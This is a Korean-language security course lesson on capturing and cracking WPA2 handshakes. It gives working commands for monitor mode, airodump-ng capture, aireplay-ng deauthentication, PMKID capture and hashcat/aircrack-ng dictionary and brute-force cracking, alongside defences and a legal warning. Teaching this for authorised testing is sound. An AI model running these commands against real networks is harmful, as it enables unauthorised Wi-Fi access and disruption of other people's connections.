WPA2 핸드셰이크 캡처와 크래킹
aircrack-ng로 4방향 핸드셰이크를 캡처하고 Hashcat으로 사전 공격을 시도합니다.
WPA2 핸드셰이크 캡처와 크래킹은(는) CoddyKit의 무료 Cyber Security Academy 강의입니다. 이것은 4개 중 2번째 강의입니다. 아래에서 전체 강의를 무료로 읽을 수 있으며, 내장 코드 에디터와 24/7 AI 튜터와 함께 브라우저에서 직접 실습할 수 있습니다. 이 강의는 Cyber Security Academy 학습 경로의 일부이며, 진행 상황이 웹과 CoddyKit 앱에 동기화됩니다. Cyber Security Academy 강의에는 총 4개의 강의가 포함되어 있습니다.
4방향 핸드셰이크
클라이언트가 WPA2 네트워크에 연결되면 4방향 핸드셰이크는 PMK(PSK에서 파생됨)와 무작위 논스를 사용해 쌍별 임시 키(PTK)를 파생합니다. 이 핸드셰이크를 캡처하면 오프라인에서 비밀번호를 크래킹할 수 있습니다.
모니터 모드 설정
모니터 모드를 사용하면 무선 카드가 목적지와 관계없이 모든 프레임을 캡처할 수 있으므로 수동 핸드셰이크 캡처에 필요합니다. 모니터 모드를 지원하는 카드에서만 작동합니다.
# Check wireless interface
iwconfig
# Enable monitor mode
sudo airmon-ng start wlan0
# Creates: wlan0mon
# Kill interfering processes first:
sudo airmon-ng check kill수동 핸드셰이크 캡처
Airodump-ng는 프레임을 수동으로 캡처합니다. 클라이언트가 자연스럽게 연결될 때까지 기다리거나 인증 해제로 재연결을 유도하세요. 핸드셰이크가 캡처되면 airodump 출력의 오른쪽 위에 표시됩니다.
# Scan for networks
sudo airodump-ng wlan0mon
# Target a specific AP (replace values)
sudo airodump-ng -c 6 \
--bssid AA:BB:CC:DD:EE:FF \
-w handshake_capture \
wlan0mon
# Top right shows: WPA handshake: AA:BB:...인증 해제 공격
스푸핑한 인증 해제 프레임을 보내면 연결된 클라이언트의 연결이 끊겼다가 다시 연결되면서 새로운 핸드셰이크가 캡처됩니다. 이 공격은 흔적이 크고 탐지하기 쉬우며, 클라이언트가 범위 안에 있어야 합니다.
# Send deauth frames (authorized labs only)
sudo aireplay-ng -0 5 \
-a AA:BB:CC:DD:EE:FF \
-c CC:DD:EE:FF:00:11 \
wlan0mon
# -0 5 = send 5 deauth frames
# -a = AP MAC
# -c = client MAC (or omit for broadcast)PMKID 공격: 클라이언트 불필요
PMKID 공격(hcxdumptool)은 연결된 클라이언트가 없어도 비콘 또는 프로브 프레임에서 PMKID를 캡처합니다. 전체 핸드셰이크를 캡처하는 것보다 빠르게 얻을 수 있으며, 크래킹 가능성은 전체 핸드셰이크와 동일합니다.
# Capture PMKID
hcxdumptool -i wlan0mon --enable_status=1 \
-o pmkid.pcapng
# Convert for Hashcat
hcxpcapngtool -o hash.hc22000 pmkid.pcapng
# Crack with Hashcat mode 22000
hashcat -m 22000 hash.hc22000 rockyou.txtHashcat으로 핸드셰이크 크래킹
캡처 파일을 변환한 다음 Hashcat의 모드 22000(WPA2 통합 형식) 또는 모드 2500(레거시 형식)으로 공격하세요. 최상의 결과를 얻으려면 rockyou.txt와 규칙을 함께 사용하세요.
# Convert pcap to Hashcat format
hcxpcapngtool -o hash.hc22000 handshake_capture-01.cap
# Crack with dictionary
hashcat -m 22000 hash.hc22000 rockyou.txt
# With rules
hashcat -m 22000 hash.hc22000 rockyou.txt -r best64.rule
# Brute force (short passwords)
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?dAircrack-ng로 크래킹
Aircrack-ng는 캡처 파일에서 직접 CPU 기반 WPA2 크래킹을 수행합니다. Hashcat의 GPU 크래킹보다 느리지만 형식을 변환할 필요가 없습니다.
# Crack with aircrack-ng
aircrack-ng -w rockyou.txt handshake_capture-01.cap
# With multiple wordlists:
aircrack-ng -w wordlist1.txt,wordlist2.txt capture-01.cap단어 목록 전략
WPA2 비밀번호 크래킹의 성공 여부는 전적으로 단어 목록의 품질에 달려 있습니다. 기본 목록으로 rockyou.txt를 사용하고, 변형을 위해 Hashcat 규칙 집합을 사용하며, 기업별 단어 목록(이름+연도+기호)과 OSINT를 통해 만든 대상별 목록도 활용하세요.
크래킹 시간의 현실
20자 이상의 무작위 WPA2 비밀번호는 계산 자원으로 크래킹하는 것이 현실적으로 불가능합니다. 크래킹은 짧거나 사전에 기반한 비밀번호를 대상으로 할 때만 실용적입니다. 따라서 복잡성 규칙보다 비밀번호의 길이와 무작위성이 더 중요합니다.
방어 방법
WPA3-SAE(오프라인 사전 공격에 안전)를 사용하거나, 20자 이상의 무작위 암호 문구를 사용하는 WPA2를 사용하세요. 또는 비밀번호 대신 인증서를 사용하는 EAP-TLS 기반 WPA2-Enterprise를 사용하세요.
법적 주의사항
자신이 소유하지 않은 네트워크에서 WPA2 핸드셰이크를 캡처하는 것은 불법입니다. 여기서 설명하는 모든 기법은 본인의 테스트 네트워크 또는 허가된 실습 환경(예: 홈 실습 환경, 전용 테스트 AP)에만 적용하세요.
빠른 확인
PMKID 공격은 표준 핸드셰이크 캡처에 비해 어떤 점을 개선하나요?
요약: WPA2 크래킹
WPA2 핸드셰이크 또는 PMKID를 캡처하면 WiFi 크래킹을 오프라인 사전 공격으로 전환할 수 있습니다. 성공 여부는 전적으로 비밀번호의 강도에 달려 있습니다. 짧고 사전에 기반한 비밀번호는 빠르게 크래킹되지만, 길고 무작위인 비밀번호는 현실적으로 크래킹할 수 없습니다. WPA3-SAE, 강력한 암호 문구, 기업 네트워크용 WPA2-Enterprise로 방어하세요.
자주 묻는 질문
“WPA2 핸드셰이크 캡처와 크래킹” 강의는 무료인가요?
네 — “WPA2 핸드셰이크 캡처와 크래킹” 전체 내용을 이 웹사이트에서 무료로 읽을 수 있습니다. 인터랙티브하게 실습하려면(내장 코드 에디터와 24/7 AI 튜터), CoddyKit PRO로 업그레이드하면 Cyber Security Academy 강의 전체를 잠금 해제할 수 있습니다. Cyber Security Academy 강의에는 총 4개의 강의가 포함되어 있습니다.
“WPA2 핸드셰이크 캡처와 크래킹”에서 뭘 배우나요?
aircrack-ng로 4방향 핸드셰이크를 캡처하고 Hashcat으로 사전 공격을 시도합니다. 브라우저에서 직접 실행하는 실습 코드로 Cyber Security Academy을(를) 배우며, 24/7 AI 튜터가 강의를 진행하면서 질문에 답변해줍니다.
Cyber Security Academy을(를) 시작하는 데 경험이 필요한가요?
사전 경험은 필요하지 않습니다. CoddyKit의 Cyber Security Academy은(는) 초급자부터 고급 학습자까지를 위해 구성되어 있으므로, 여기서 시작하거나 처음부터 시작할 수 있으며 자신의 속도대로 진행할 수 있습니다. 이것은 4개 중 2번째 강의입니다.
“WPA2 핸드셰이크 캡처와 크래킹” 강의는 얼마나 걸리나요?
대부분의 CoddyKit 강의는 약 5~10분이 소요됩니다. 각 강의는 간결하고 인터랙티브하여 꾸준한 진행이 가능하며, 웹과 앱에서 중단한 부분부터 바로 시작할 수 있습니다.
이 Cyber Security Academy 강의에서 코드를 작성하고 실행할 수 있나요?
네. 모든 Cyber Security Academy 강의에는 내장 코드 에디터가 포함되어 있으므로, 브라우저에서 바로 실제 코드를 작성하고 실행한 후 즉시 AI 피드백을 받을 수 있습니다 — 로컬 설정이 필요 없습니다.